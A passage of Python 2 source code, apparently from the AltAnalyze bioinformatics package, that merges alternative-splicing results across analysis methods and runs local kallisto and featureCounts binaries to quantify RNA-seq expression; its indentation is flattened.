print junction_type, expressed_junction_types[junction_type]
out_file = string.replace(fn,'.txt','-highExp.txt')
print 'Exporting the highest expressed exons to:', out_file
out_obj = export.ExportFile(out_file)
### Compare the relative expression of junctions and exons separately for each gene (junctions are more comparable)
for gene in exon_max_exp_db:
junction_set=[]; exon_set=[]; junction_exp=[]; exon_exp=[]
exon_max_exp_db[gene].sort()
exon_max_exp_db[gene].reverse()
for (exp,uid) in exon_max_exp_db[gene]:
if '-' in uid: junction_set.append((exp,uid)); junction_exp.append(exp)
else: exon_set.append((exp,uid)); exon_exp.append(exp)
if len(junction_set)>0:
maxJunctionExp = junction_set[0][0]
try: lower25th,median_val,upper75th,int_qrt_range = statistics.iqr(junction_exp)
except Exception: print junction_exp;sys.exit()
if int_qrt_range>0:
maxJunctionExp = int_qrt_range
junction_percent_exp = map(lambda x: (x[1],expThreshold(x[0]/maxJunctionExp,cutoff)), junction_set)
high_exp_junctions = []
for (uid,p) in junction_percent_exp: ### ID and percentage of expression
if p!='NA':
if uid in features_to_export: ### novel exons only right now
out_obj.write(uid_key_db[uid]+'\t'+p+'\n') ### write out the original ID with coordinates
if len(exon_set)>0:
maxExonExp = exon_set[0][0]
lower25th,median_val,upper75th,int_qrt_range = statistics.iqr(exon_exp)
if int_qrt_range>0:
maxExonExp = int_qrt_range
exon_percent_exp = map(lambda x: (x[1],expThreshold(x[0]/maxExonExp,cutoff)), exon_set)
high_exp_exons = []
for (uid,p) in exon_percent_exp: ### ID and percentage of expression
if p!='NA':
if uid in features_to_export:
out_obj.write(uid_key_db[uid]+'\t'+p+'\n')
out_obj.close()
def expThreshold(ratio,cutoff):
#print [ratio,cutoff]
if ratio>cutoff: return str(ratio)
else: return 'NA'
def compareExonAndJunctionResults(species,array_type,summary_results_db,root_dir):
results_dir = root_dir +'AltResults/AlternativeOutput/'
dir_list = read_directory(results_dir)
filtered_dir_db={}
#"""
try: novel_exon_junction_db = getNovelExonCoordinates(species,root_dir)
except Exception:
#print traceback.format_exc()
print 'No counts file found.'
novel_exon_junction_db={} ### only relevant to RNA-Seq analyses
for comparison_file in summary_results_db:
for results_file in dir_list:
if (comparison_file in results_file and '-exon-inclusion-results.txt' in results_file) and ('comparison' not in results_file):
try: filtered_dir_db[comparison_file].append(results_file)
except Exception: filtered_dir_db[comparison_file] = [results_file]
try: os.remove(string.split(results_dir,'AltResults')[0]+'AltResults/Clustering/Combined-junction-exon-evidence.txt')
except Exception: pass
for comparison_file in filtered_dir_db:
alt_result_files = filtered_dir_db[comparison_file]
#print alt_result_files, comparison_file
importAltAnalyzeExonResults(alt_result_files,novel_exon_junction_db,results_dir)
#"""
### Build combined clusters of high-confidence exons
graphics2=[]; graphics=[]
import ExpressionBuilder
try:
input_dir = string.split(results_dir,'AltResults')[0]+'GO-Elite/AltExonConfirmed/'
cluster_file, rows_in_file = ExpressionBuilder.buildAltExonClusterInputs(input_dir,species,array_type,dataType='AltExonConfirmed')
if rows_in_file > 5000: useHOPACH = False
else: useHOPACH = True
if rows_in_file < 12000:
graphics = ExpressionBuilder.exportHeatmap(cluster_file,useHOPACH=useHOPACH)
except Exception: pass
try:
input_dir = string.split(results_dir,'AltResults')[0]+'GO-Elite/AltExon/'
cluster_file, rows_in_file = ExpressionBuilder.buildAltExonClusterInputs(input_dir,species,array_type,dataType='AltExon')
if rows_in_file > 5000: useHOPACH = False
else: useHOPACH = True
if rows_in_file < 12000:
graphics2 = ExpressionBuilder.exportHeatmap(cluster_file,useHOPACH=useHOPACH)
except Exception: pass
return graphics+graphics2
class SplicingData:
def __init__(self,score,symbol,description,exonid,probesets,direction,splicing_event,external_exon,genomic_loc,gene_exp,protein_annot,domain_inferred,domain_overlap,method,dataset):
self.score = score; self.dataset = dataset
self.symbol = symbol;
self.description=description;self.exonid=exonid;self.probesets=probesets;self.direction=direction
self.splicing_event=splicing_event;self.external_exon=external_exon;self.genomic_loc=genomic_loc;
self.gene_exp=gene_exp;self.protein_annot=protein_annot;self.domain_inferred=domain_inferred
self.domain_overlap=domain_overlap;self.method=method
def Score(self): return self.score
def setScore(self,score): self.score = score
def GeneExpression(self): return self.gene_exp
def Dataset(self): return self.dataset
def Symbol(self): return self.symbol
def Description(self): return self.description
def ExonID(self): return self.exonid
def appendExonID(self,exonid): self.exonid+='|'+exonid
def Probesets(self): return self.probesets
def ProbesetDisplay(self):
if len(self.Probesets()[1])>0:
return string.join(self.Probesets(),'-')
else:
return self.Probesets()[0]
def ProbesetsSorted(self):
### Don't sort the original list
a = [self.probesets[0],self.probesets[1]]
a.sort()
return a
def Direction(self): return self.direction
def setDirection(self,direction): self.direction = direction
def SplicingEvent(self): return self.splicing_event
def ProteinAnnotation(self): return self.protein_annot
def DomainInferred(self): return self.domain_inferred
def DomainOverlap(self): return self.domain_overlap
def Method(self): return self.method
def setEvidence(self,evidence): self.evidence = evidence
def Evidence(self): return self.evidence
def GenomicLocation(self): return self.genomic_loc
def setExonExpStatus(self, exon_expressed): self.exon_expressed = exon_expressed
def ExonExpStatus(self): return self.exon_expressed
def importAltAnalyzeExonResults(dir_list,novel_exon_junction_db,results_dir):
regulated_critical_exons={}; converted_db={}
includeExonJunctionComps=True ### Allow ASPIRE comparisons with the inclusion feature as an exon to count for additive reciprocal evidence
print "Reading AltAnalyze results file"
root_dir = string.split(results_dir,'AltResults')[0]
for filename in dir_list:
x=0; regulated_critical_exon_temp={}
fn=filepath(results_dir+filename)
new_filename = string.join(string.split(filename,'-')[:-5],'-')
if '_vs_' in filename and '_vs_' in new_filename: export_filename = new_filename
else: export_filename = string.join(string.split(filename,'-')[:-5],'-')
export_path = results_dir+export_filename+'-comparison-evidence.txt'
try: os.remove(filepath(export_path)) ### If we don't do this, the old results get added to the new
except Exception: null=[]
if 'AltMouse' in filename:
altmouse_ensembl_db = importAltMouseEnsembl()
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
if x==0: x=1; #print t[12],t[13],t[22],t[23]
else:
converted = False ### Indicates both junction sides were regulated
geneid = t[0]; exonid = t[4]; probeset1 = t[6]; probeset2 = ''; score = t[1][:4]; symbol = t[2]; description = t[3]; regions = t[-4]; direction = t[5]
genomic_loc = t[-1]; splicing_event = t[-3]; external_exon = t[-6]; gene_exp_fold = t[-8]; protein_annot = t[14]; domain_inferred = t[15]; domain_overlap = t[17]
expressed_exon = 'NA'
if 'RNASeq' in filename: expressed_exon = 'no' ### Set by default
if ':' in geneid: geneid = string.split(geneid,':')[0] ### User reported that gene:gene was appearing and not sure exactly where or why but added this to address it
if 'FIRMA' in fn: method = 'FIRMA'
elif 'splicing-index' in fn: method = 'splicing-index'
if 'ASPIRE' in filename or 'linearregres' in filename:
f1=float(t[12]); f2=float(t[13]); probeset1 = t[8]; probeset2 = t[10]; direction = t[6]; exonid2 = t[5]; splicing_event = t[-4]
protein_annot = t[19]; domain_inferred = t[20]; domain_overlap = t[24]; method = 'linearregres'; regions = t[-5]
exon1_exp=float(t[-15]); exon2_exp=float(t[-14]); fold1=float(t[12]); fold2=float(t[13])
if fold1<0: fold1 = 1 ### don't factor in negative changes
if fold2<0: fold2 = 1 ### don't factor in negative changes
"""
if 'RNASeq' not in filename:
exon1_exp = math.pow(2,exon1_exp)
exon2_exp = math.log(2,exon2_exp)
m1 = exon1_exp*fold1
m2 = exon2_exp*fold2
max_exp = max([m1,m2])
min_exp = min([m1,m2])
percent_exon_expression = str(min_exp/max_exp)
"""
if 'ASPIRE' in filename: method = 'ASPIRE'; score = t[1][:5]
if '-' not in exonid and includeExonJunctionComps == False:
exonid=None ### Occurs when the inclusion just in an exon (possibly won't indicate confirmation so exclude)
else: exonid = exonid+' vs. '+exonid2
if 'AltMouse' in filename:
try: geneid = altmouse_ensembl_db[geneid]
except Exception: geneid = geneid
if 'RNASeq' not in filename and 'junction' not in filename: regions = string.replace(regions,'-','.')
else:
if 'RNASeq' in filename and '-' not in exonid:
fold = float(t[10]); exon_exp = float(t[18]); gene_exp = float(t[19])
if fold < 0: fold = -1.0/fold
GE_fold = float(gene_exp_fold)
if GE_fold < 0: GE_fold = -1.0/float(gene_exp_fold)
exon_psi1 = abs(exon_exp)/(abs(gene_exp))
exon_psi2 = (abs(exon_exp)*fold)/(abs(gene_exp)*GE_fold)
max_incl_exon_exp = max([exon_psi1,exon_psi2])
#if max_incl_exon_exp>0.20: expressed_exon = 'yes'
expressed_exon = max_incl_exon_exp
#if 'I2.1_75953139' in probeset1:
#print [exon_exp,gene_exp,exon_exp*fold,gene_exp*GE_fold]
#print exon_psi1, exon_psi2;sys.exit()
probesets = [probeset1,probeset2]
if (method == 'splicing-index' or method == 'FIRMA') and ('-' in exonid) or exonid == None:
pass #exclude junction IDs
else:
regions = string.replace(regions,';','|')
regions = string.replace(regions,'-','|')
regions = string.split(regions,'|')
for region in regions:
if len(region) == 0:
try: region = t[17]+t[18] ### For junction introns where no region ID exists
except Exception: null=[]
if ':' in region: region = string.split(region,':')[-1] ### User reported that gene:gene was appearing and not sure exactly where or why but added this to address it
if probeset1 in novel_exon_junction_db:
uid = novel_exon_junction_db[probeset1] ### convert the uid (alternative exon) to the annotated ID for the novel exon
converted_db[uid] = probeset1
else:
uid = geneid+':'+region
ss = SplicingData(score,symbol,description,exonid,probesets,direction,splicing_event,external_exon,genomic_loc,gene_exp_fold,protein_annot,domain_inferred,domain_overlap,method,filename)
ss.setExonExpStatus(str(expressed_exon))
try: regulated_critical_exon_temp[uid].append(ss)
except Exception: regulated_critical_exon_temp[uid] = [ss]
#print filename, len(regulated_critical_exon_temp)
for uid in regulated_critical_exon_temp:
report=None
if len(regulated_critical_exon_temp[uid])>1:
### We are only reporting one here and that's OK, since we are only reporting the top scores... won't include all inclusion junctions.
scores=[]
for ss in regulated_critical_exon_temp[uid]: scores.append((float(ss.Score()),ss))
scores.sort()
if (scores[0][0]*scores[-1][0])<0:
ss1 = scores[0][1]; ss2 = scores[-1][1]
if ss1.ProbesetsSorted() == ss2.ProbesetsSorted(): ss1.setDirection('mutual') ### same exons, hence, mutually exclusive event (or similiar)
else: ss1.setDirection('both') ### opposite directions in the same comparison-file, hence, conflicting data
report=[ss1]
else:
if abs(scores[0][0])>abs(scores[-1][0]): report=[scores[0][1]]
else: report=[scores[-1][1]]
else:
report=regulated_critical_exon_temp[uid]
### Combine data from different analysis files
try: regulated_critical_exons[uid]+=report
except Exception: regulated_critical_exons[uid]=report
"""if 'ENSG00000204120' in uid:
print uid,
for i in regulated_critical_exon_temp[uid]:
print i.Probesets(),
print ''
"""
try: report[0].setEvidence(len(regulated_critical_exon_temp[uid])) ###set the number of exons demonstrating regulation of this exons
except Exception: null=[]
clearObjectsFromMemory(regulated_critical_exon_temp)
export_data,status = AppendOrWrite(export_path)
if status == 'not found':
header = string.join(['uid','source-IDs','symbol','description','exonids','independent confirmation','score','regulation direction','alternative exon annotations','associated isoforms','inferred regulated domains','overlapping domains','method','supporting evidence score','novel exon: high-confidence','percent exon expression of gene','differential gene-expression','genomic location'],'\t')+'\n'
export_data.write(header)
combined_export_path = string.split(results_dir,'AltResults')[0]+'AltResults/Clustering/Combined-junction-exon-evidence.txt'
combined_export_data, status= AppendOrWrite(combined_export_path)
if status == 'not found':
header = string.join(['uid','source-IDs','symbol','description','exonids','independent confirmation','score','regulation direction','alternative exon annotations','associated isoforms','inferred regulated domains','overlapping domains','method','supporting evidence score','novel exon: high-confidence','percent exon expression of gene','differential gene-expression','genomic location','comparison'],'\t')+'\n'
combined_export_data.write(header)
print len(regulated_critical_exons), 'regulated exon IDs imported.\n'
print 'writing:',export_path; n=0
# print [len(converted_db)]
### Check for alternative 3' or alternative 5' exon regions that were not matched to the right reciprocal junctions (occurs because only one of the exon regions is called alternative)
regulated_critical_exons_copy={}
for uid in regulated_critical_exons:
regulated_critical_exons_copy[uid]=regulated_critical_exons[uid]
u=0
### This is most applicable to RNA-Seq since the junction IDs correspond to the Exon Regions not the probeset Exon IDs
for uid in regulated_critical_exons_copy: ### Look through the copied version since we can't delete entries while iterating through
ls = regulated_critical_exons_copy[uid]
u+=1
#if u<20: print uid
for jd in ls:
if jd.Method() != 'splicing-index' and jd.Method() != 'FIRMA':
try: ### Applicable to RNA-Seq
gene,exonsEx = string.split(jd.Probesets()[1],':') ### Exclusion probeset will have the exon not annotated as the critical exon (although it should be as well)
gene,exonsIn = string.split(jd.Probesets()[0],':')
except Exception:
gene, ce = string.split(uid,':')
exonsIn, exonsEx = string.split(jd.ExonID(),'vs.')
if gene !=None:
critical_exon = None
five_prime,three_prime = string.split(exonsEx,'-')
try: five_primeIn,three_primeIn = string.split(exonsIn,'-')
except Exception: five_primeIn = exonsIn; three_primeIn = exonsIn ### Only should occur during testing when a exon rather than junction ID is considered
#if gene == 'ENSG00000133083': print five_prime,three_prime, five_primeIn,three_primeIn
if five_primeIn == five_prime: ### Hence, the exclusion 3' exon should be added
critical_exon = gene+':'+three_prime
exonid = three_prime
elif three_primeIn == three_prime: ### Hence, the exclusion 3' exon should be added
critical_exon = gene+':'+five_prime
exonid = five_prime
else:
if ('5' in jd.SplicingEvent()) or ('five' in jd.SplicingEvent()):
critical_exon = gene+':'+five_prime
exonid = five_prime
elif ('3' in jd.SplicingEvent()) or ('three' in jd.SplicingEvent()):
critical_exon = gene+':'+three_prime
exonid = three_prime
elif ('alt-N-term' in jd.SplicingEvent()) or ('altPromoter' in jd.SplicingEvent()):
critical_exon = gene+':'+five_prime
exonid = five_prime
elif ('alt-C-term' in jd.SplicingEvent()):
critical_exon = gene+':'+three_prime
exonid = three_prime
#print critical_exon, uid, jd.ExonID(),jd.SplicingEvent(); sys.exit()
if critical_exon != None:
if critical_exon in regulated_critical_exons:
#print uid, critical_exon; sys.exit()
if len(regulated_critical_exons[critical_exon]) == 1:
if len(ls)==1 and uid in regulated_critical_exons: ### Can be deleted by this method
if 'vs.' not in regulated_critical_exons[critical_exon][0].ExonID() and 'vs.' not in regulated_critical_exons[critical_exon][0].ExonID():
regulated_critical_exons[uid].append(regulated_critical_exons[critical_exon][0])
del regulated_critical_exons[critical_exon]
elif uid in regulated_critical_exons: ###If two entries already exit
ed = regulated_critical_exons[uid][1]
ed2 = regulated_critical_exons[critical_exon][0]
if 'vs.' not in ed.ExonID() and 'vs.' not in ed2.ExonID():
if ed.Direction() != ed2.Direction(): ### should be opposite directions
ed.appendExonID(exonid)
ed.setEvidence(ed.Evidence()+1)
ed.setScore(ed.Score()+'|'+ed2.Score())
del regulated_critical_exons[critical_exon]
firstEntry=True
for uid in regulated_critical_exons:
if uid in converted_db:
converted = True
else: converted = False
#if 'ENSG00000133083' in uid: print [uid]
exon_level_confirmation = 'no'
ls = regulated_critical_exons[uid]
jd = regulated_critical_exons[uid][0] ### We are only reporting one here and that's OK, since we are only reporting the top scores... won't include all inclusion junctions.
if len(ls)>1:
methods = []; scores = []; direction = []; exonids = []; probesets = []; evidence = 0; genomic_location = []
junctionids=[]
junction_data_found = 'no'; exon_data_found = 'no'
for jd in ls:
if jd.Method() == 'ASPIRE' or jd.Method() == 'linearregres':
junction_data_found = 'yes'
methods.append(jd.Method())
scores.append(jd.Score())
direction.append(jd.Direction())
exonids.append(jd.ExonID())
junctionids.append(jd.ExonID())
probesets.append(jd.ProbesetDisplay())
evidence+=jd.Evidence()
genomic_location.append(jd.GenomicLocation())
### Prefferentially obtain isoform annotations from the reciprocal analysis which is likely more accurate
isoform_annotations = [jd.ProteinAnnotation(), jd.DomainInferred(), jd.DomainOverlap()]
for ed in ls:
if ed.Method() == 'splicing-index' or ed.Method() == 'FIRMA':
exon_data_found = 'yes' ### pick one of them
methods.append(ed.Method())
scores.append(ed.Score())
direction.append(ed.Direction())
exonids.append(ed.ExonID())
probesets.append(ed.ProbesetDisplay())
evidence+=ed.Evidence()
genomic_location.append(ed.GenomicLocation())
#isoform_annotations = [ed.ProteinAnnotation(), ed.DomainInferred(), ed.DomainOverlap()]
if junction_data_found == 'yes' and exon_data_found == 'yes':
exon_level_confirmation = 'yes'
for junctions in junctionids:
if 'vs.' in junctions:
j1 = string.split(junctions,' vs. ')[0] ### inclusion exon or junction
if '-' not in j1: ### not a junction, hence, may not be sufficient to use for confirmation (see below)
if 'I' in j1: ### intron feature
if '_' in j1: ### novel predicted exon
exon_level_confirmation = 'no'
else:
exon_level_confirmation = 'yes'
else:
if '_' in j1:
exon_level_confirmation = 'no'
else:
exon_level_confirmation = 'partial'
method = string.join(methods,'|')
unique_direction = unique.unique(direction)
genomic_location = unique.unique(genomic_location)
if len(unique_direction) == 1: direction = unique_direction[0]
else: direction = string.join(direction,'|')
score = string.join(scores,'|')
probesets = string.join(probesets,'|')
exonids_unique = unique.unique(exonids)
if len(exonids_unique) == 1: exonids = exonids_unique[0]
else: exonids = string.join(exonids,'|')
if len(genomic_location) == 1: genomic_location = genomic_location[0]
else: genomic_location = string.join(genomic_location,'|')
evidence = str(evidence)
if 'mutual' in direction: direction = 'mutual'
if len(ls) == 1:
probesets = jd.ProbesetDisplay()
direction = jd.Direction()
score = jd.Score()
method = jd.Method()
exonids = jd.ExonID()
evidence = jd.Evidence()
genomic_location = jd.GenomicLocation()
isoform_annotations = [jd.ProteinAnnotation(), jd.DomainInferred(), jd.DomainOverlap()]
try:
#if int(evidence)>4 and 'I' in uid: novel_exon = 'yes' ### high-evidence novel exon
#else: novel_exon = 'no'
if converted == True:
novel_exon = 'yes'
splicing_event = 'cassette-exon'
else:
novel_exon = 'no'
splicing_event = jd.SplicingEvent()
values = [uid, probesets, jd.Symbol(), jd.Description(), exonids, exon_level_confirmation, score, direction, splicing_event]
values += isoform_annotations+[method, str(evidence),novel_exon,jd.ExonExpStatus(),jd.GeneExpression(),genomic_location]
values = string.join(values,'\t')+'\n'
#if 'yes' in exon_level_confirmation:
export_data.write(values); n+=1
if exon_level_confirmation != 'no' and ('|' not in direction):
geneID = string.split(uid,':')[0]
try: relative_exon_exp = float(jd.ExonExpStatus())
except Exception: relative_exon_exp = 1
if firstEntry:
### Also export high-confidence predictions for GO-Elite
elite_export_path = string.split(results_dir,'AltResults')[0]+'GO-Elite/AltExonConfirmed/'+export_filename+'-junction-exon-evidence.txt'
elite_export_data = export.ExportFile(elite_export_path)
elite_export_data.write('GeneID\tEn\tExonID\tScores\tGenomicLocation\n')
firstEntry = False
if relative_exon_exp>0.10:
elite_export_data.write(string.join([geneID,'En',uid,score,genomic_location],'\t')+'\n')
#if 'DNA' in isoform_annotations[-1]:
if '2moter' not in jd.SplicingEvent() and '2lt-N' not in jd.SplicingEvent():
values = [uid, probesets, jd.Symbol(), jd.Description(), exonids, exon_level_confirmation, score, direction, splicing_event]
values += isoform_annotations+[method, str(evidence),novel_exon,jd.ExonExpStatus(),jd.GeneExpression(),genomic_location,export_filename]
values = string.join(values,'\t')+'\n'
combined_export_data.write(values)
except Exception, e:
#print traceback.format_exc();sys.exit()
pass ### Unknown error - not evaluated in 2.0.8 - isoform_annotations not referenced
print n,'exon IDs written to file.'
export_data.close()
try: elite_export_data.close()
except Exception: pass
clearObjectsFromMemory(regulated_critical_exons)
clearObjectsFromMemory(regulated_critical_exons_copy)
#print '!!!!Within comparison evidence'
#returnLargeGlobalVars()
def FeatureCounts(bed_ref, bam_file):
output = bam_file[:-4]+'__FeatureCounts.bed'
import subprocess
#if '/bin' in kallisto_dir: kallisto_file = kallisto_dir +'/apt-probeset-summarize' ### if the user selects an APT directory
kallisto_dir= 'AltDatabase/subreads/'
if os.name == 'nt':
featurecounts_file = kallisto_dir + 'PC/featureCounts.exe'; plat = 'Windows'
elif 'darwin' in sys.platform:
featurecounts_file = kallisto_dir + 'Mac/featureCounts'; plat = 'MacOSX'
elif 'linux' in sys.platform:
featurecounts_file = kallisto_dir + '/Linux/featureCounts'; plat = 'linux'
print 'Using',featurecounts_file
featurecounts_file = filepath(featurecounts_file)
featurecounts_root = string.split(featurecounts_file,'bin/featureCounts')[0]
featurecounts_file = filepath(featurecounts_file)
print [featurecounts_file,"-a", "-F", "SAF",bed_ref, "-o", output, bam_file]
retcode = subprocess.call([featurecounts_file,"-a",bed_ref, "-F", "SAF", "-o", output, bam_file])
def filterFASTAFiles(fasta_files):
filter_fasta_files=[]
filter_dir = export.findParentDir(fasta_files[0])+'/filtered_fasta'
try: os.mkdir(filter_dir)
except Exception: pass
for file in fasta_files:
if 'filtered.fa' in file:
if file not in filter_fasta_files:
filter_fasta_files.append(file)
else:
filtered_fasta = file[:-3]+'-filtered.fa'
filter_fasta_files.append(filtered_fasta)
filename = export.findFilename(file)
eo=export.ExportFile(filtered_fasta)
for line in open(file,'rU').xreadlines():
if '>'==line[0]:
skip=False
### Exclude non-standard chromosomal transcripts
if 'PATCH' in line or '_1_' in line or '_1:' in line or ':HSCHR' in line or 'putative' in line or 'supercontig' in line or 'NOVEL_TEST' in line:
skip=True
else:
space_delim=string.split(line,' ')
space_delim=[string.split(space_delim[0],'.')[0]]+space_delim[1:]
line=string.join(space_delim,' ')
eo.write(line)
elif skip==False:
eo.write(line)
eo.close()
shutil.move(file,filter_dir+'/'+filename)
return filter_fasta_files
def getCoordinateFile(species):
geneCoordFile = 'AltDatabase/ensembl/'+species+'/'+species+'_Ensembl_transcript-annotations.txt'
geneCoordFile = unique.filepath(geneCoordFile)
status = verifyFile(geneCoordFile)
if status == 'not found':
try:
from build_scripts import EnsemblSQL
ensembl_version = string.replace(unique.getCurrentGeneDatabaseVersion(),'EnsMart','')
configType = 'Advanced'; analysisType = 'AltAnalyzeDBs'; externalDBName = ''; force = 'no'
EnsemblSQL.buildEnsemblRelationalTablesFromSQL(species,configType,analysisType,externalDBName,ensembl_version,force,buildCommand='exon')
except Exception:
#print traceback.format_exc()
print 'Failed to export a transcript-exon coordinate file (similar to a GTF)!!!!\n...Proceeding with standard Kallisto (no-splicing).'
geneCoordFile=None
return geneCoordFile
def runKallisto(species,dataset_name,root_dir,fastq_folder,mlp,returnSampleNames=False,customFASTA=None,log_output=True):
#print 'Running Kallisto...please be patient'
import subprocess
n_threads = mlp.cpu_count()
print 'Number of threads =',n_threads
#n_threads = 1
kallisto_dir_objects = os.listdir(unique.filepath('AltDatabase/kallisto'))
### Determine version
version = '0.43.1'
for subdir in kallisto_dir_objects:
if subdir.count('.')>1: version = subdir
kallisto_dir= 'AltDatabase/kallisto/'+version+'/'
if os.name == 'nt':
kallisto_file = kallisto_dir + 'PC/bin/kallisto.exe'; plat = 'Windows'
elif 'darwin' in sys.platform:
kallisto_file = kallisto_dir + 'Mac/bin/kallisto'; plat = 'MacOSX'
elif 'linux' in sys.platform:
kallisto_file = kallisto_dir + '/Linux/bin/kallisto'; plat = 'linux'
print 'Using',kallisto_file
kallisto_file = filepath(kallisto_file)
kallisto_root = string.split(kallisto_file,'bin/kallisto')[0]
fn = filepath(kallisto_file)
try: os.chmod(fn,0777) ### It's rare, but this can be a write issue
except: pass
output_dir=root_dir+'/ExpressionInput/kallisto/'
try: os.mkdir(root_dir+'/ExpressionInput')
except Exception: pass
try: os.mkdir(root_dir+'/ExpressionInput/kallisto')
except Exception: pass
fastq_folder += '/'
dir_list = read_directory(fastq_folder)
fastq_paths = []
for file in dir_list:
file_lower = string.lower(file)
if 'fastq' in file_lower and '._' not in file[:4]: ### Hidden files
fastq_paths.append(fastq_folder+file)
fastq_paths,paired = findPairs(fastq_paths)
### Check to see if Kallisto files already exist and use these if so (could be problematic but allows for outside quantification)
kallisto_tsv_paths=[]
dir_list = read_directory(output_dir)
for folder in dir_list:
kallisto_outdir = output_dir+folder+'/abundance.tsv'
status = os.path.isfile(kallisto_outdir)
if status:
kallisto_tsv_paths.append(fastq_folder+file)
if returnSampleNames:
return fastq_paths
### Store/retreive the Kallisto index in the Ensembl specific SequenceData location
kallisto_index_root = 'AltDatabase/'+species+'/SequenceData/'
try: os.mkdir(filepath(kallisto_index_root))
except Exception: pass
indexFile = filepath(kallisto_index_root+species)
#indexFile = filepath(kallisto_index_root + 'Hs_intron')
indexStatus = os.path.isfile(indexFile)
if indexStatus == False or customFASTA!=None:
try: fasta_files = getFASTAFile(species)
except Exception: fasta_files = []
index_file = filepath(kallisto_index_root+species)
if len(fasta_files)==0 and customFASTA==None:
###download Ensembl fasta file to the above directory
from build_scripts import EnsemblSQL
ensembl_version = string.replace(unique.getCurrentGeneDatabaseVersion(),'EnsMart','')
try:
EnsemblSQL.getEnsemblTranscriptSequences(ensembl_version,species,restrictTo='cDNA')
fasta_files = getFASTAFile(species)
except Exception: pass
elif customFASTA!=None: ### Custom FASTA file supplied by the user
fasta_files = [customFASTA]
indexFile = filepath(kallisto_index_root+species+'-custom')
try: os.remove(indexFile) ### erase any pre-existing custom index
except Exception: pass
if len(fasta_files)>0:
print 'Building kallisto index file...'
arguments = [kallisto_file, "index","-i", indexFile]
fasta_files = filterFASTAFiles(fasta_files)
for fasta_file in fasta_files:
arguments.append(fasta_file)
try:
retcode = subprocess.call(arguments)
except Exception:
print traceback.format_exc()
if customFASTA!=None:
reimportExistingKallistoOutput = False
elif len(kallisto_tsv_paths) == len(fastq_paths):
reimportExistingKallistoOutput = True
elif len(kallisto_tsv_paths) > len(fastq_paths):
reimportExistingKallistoOutput = True ### If working with a directory of kallisto results
else:
reimportExistingKallistoOutput = False
if reimportExistingKallistoOutput:
print 'NOTE: Re-import PREVIOUSLY GENERATED kallisto output:',reimportExistingKallistoOutput
print '...To force re-analysis of FASTQ files, delete the folder "kallisto" in "ExpressionInput"'
### Just get the existing Kallisto output folders
fastq_paths = read_directory(output_dir)
kallisto_folders=[]
try:
import collections
expMatrix = collections.OrderedDict()
countMatrix = collections.OrderedDict()
countSampleMatrix = collections.OrderedDict()
sample_total_counts = collections.OrderedDict()
except Exception:
try:
import ordereddict
expMatrix = ordereddict.OrderedDict()
countMatrix = ordereddict.OrderedDict()
countSampleMatrix = ordereddict.OrderedDict()
sample_total_counts = ordereddict.OrderedDict()
except Exception:
expMatrix={}
countMatrix={}
countSampleMatrix={}
sample_total_counts={}
headers=['UID']
### Verify, import, create and/or ignore the transcript exon coordinate file for BAM file creation
geneCoordFile = getCoordinateFile(species)
for n in fastq_paths:
output_path = output_dir+n
kallisto_folders.append(output_path)
if reimportExistingKallistoOutput == False:
begin_time = time.time()
if geneCoordFile != None: ### For BAM and BED file generation
print 'Running kallisto on:',n,'...',
p=fastq_paths[n]
b=[" > "+n+'.sam']
bedFile = root_dir+ '/' + n + '__junction.bed'
kallisto_out = open(root_dir+ '/' + n + '.bam', 'ab')
if log_output:
err_out = open(output_dir + '/log.txt', 'a')
err_out.seek(0, 2) # Subprocess doesn't move the file pointer when appending!
else:
err_out = None
kallisto_out.seek(0, 2) # Subprocess doesn't move the file pointer when appending!
if paired == 'paired':
s=[]
else:
s=["--single","-l","200","-s","20"]
#geneCoordFile=None - force to run simple Kallisto
if geneCoordFile==None:
try: ### Without BAM and BED file generation
retcode = subprocess.call([kallisto_file, "quant","-i", indexFile, "-o", output_path]+s+p)
except Exception:
print traceback.format_exc()
else: ### Attempt to export BAM and BED files with Kallisto quantification
kallisto_command = [kallisto_file, "quant", "-i", indexFile, "-o", output_path,
"-g", geneCoordFile, "-j", bedFile, "--threads="+str(n_threads), "--sortedbam"] + s +p
kallisto_process = subprocess.Popen(kallisto_command, stdout=kallisto_out, stderr=err_out)
kallisto_process.communicate()
retcode = kallisto_process.returncode
if os.name == 'nt':
try:
sam_process = subprocess.Popen('AltDatabase\samtools\samtools.exe index ' + root_dir+ '/' + n + '.bam')
sam_process.communicate()
retcode_sam = sam_process.returncode
except: pass
#retcode = subprocess.call([kallisto_file, "quant","-i", indexFile, "-o", output_path,"--pseudobam"]+p+b)
#retcode = subprocess.call([kallisto_file, "quant","-i", indexFile, "-o", output_path]+p)
"""except Exception:
print traceback.format_exc()
kill
retcode = subprocess.call(['kallisto', "quant","-i", indexFile, "-o", output_path]+p)"""
if retcode == 0: print 'completed in', int(time.time()-begin_time), 'seconds'
else: print 'kallisto failed due to an unknown error (report to altanalyze.org help).'
#"""
input_path = output_path+'/abundance.txt'
try:
try: expMatrix,countMatrix,countSampleMatrix=importTPMs(n,input_path,expMatrix,countMatrix,countSampleMatrix)
except Exception:
input_path = output_path+'/abundance.tsv'
expMatrix,countMatrix,countSampleMatrix=importTPMs(n,input_path,expMatrix,countMatrix,countSampleMatrix)
headers.append(n)
sample_total_counts = importTotalReadCounts(n,output_path+'/run_info.json',sample_total_counts)
except Exception:
print traceback.format_exc()
sys.exit()
print n, 'TPM expression import failed'
if paired == 'paired':
print '\n...Make sure the paired-end samples were correctly assigned:'
print fastq_paths
for i in fastq_paths:
print 'Common name:',i,
for x in fastq_paths[i]:
print export.findParentDir(x),
print '\n'
### Summarize alignment information
for sample in countSampleMatrix:
try: estCounts = int(float(countSampleMatrix[sample]))
except Exception: estCounts='NA'
try: totalCounts = sample_total_counts[sample]
except Exception: totalCounts = 'NA'
try: aligned = str(100*estCounts/float(totalCounts))
except Exception: aligned = 'NA'
try: aligned = string.split(aligned,'.')[0]+'.'+string.split(aligned,'.')[1][:2]
except Exception: aligned = 'NA'
countSampleMatrix[sample] = [str(estCounts),totalCounts,aligned]
dataset_name = string.replace(dataset_name,'exp.','')
dataset_name = string.replace(dataset_name,'.txt','')
to = export.ExportFile(root_dir+'/ExpressionInput/transcript.'+dataset_name+'.txt')
ico = export.ExportFile(root_dir+'/ExpressionInput/isoCounts.'+dataset_name+'.txt')
go = export.ExportFile(root_dir+'/ExpressionInput/exp.'+dataset_name+'.txt')
co = export.ExportFile(root_dir+'/ExpressionInput/counts.'+dataset_name+'.txt')
so = export.ExportFile(root_dir+'/ExpressionInput/summary.'+dataset_name+'.txt')
exportMatrix(to,headers,expMatrix) ### Export transcript expression matrix
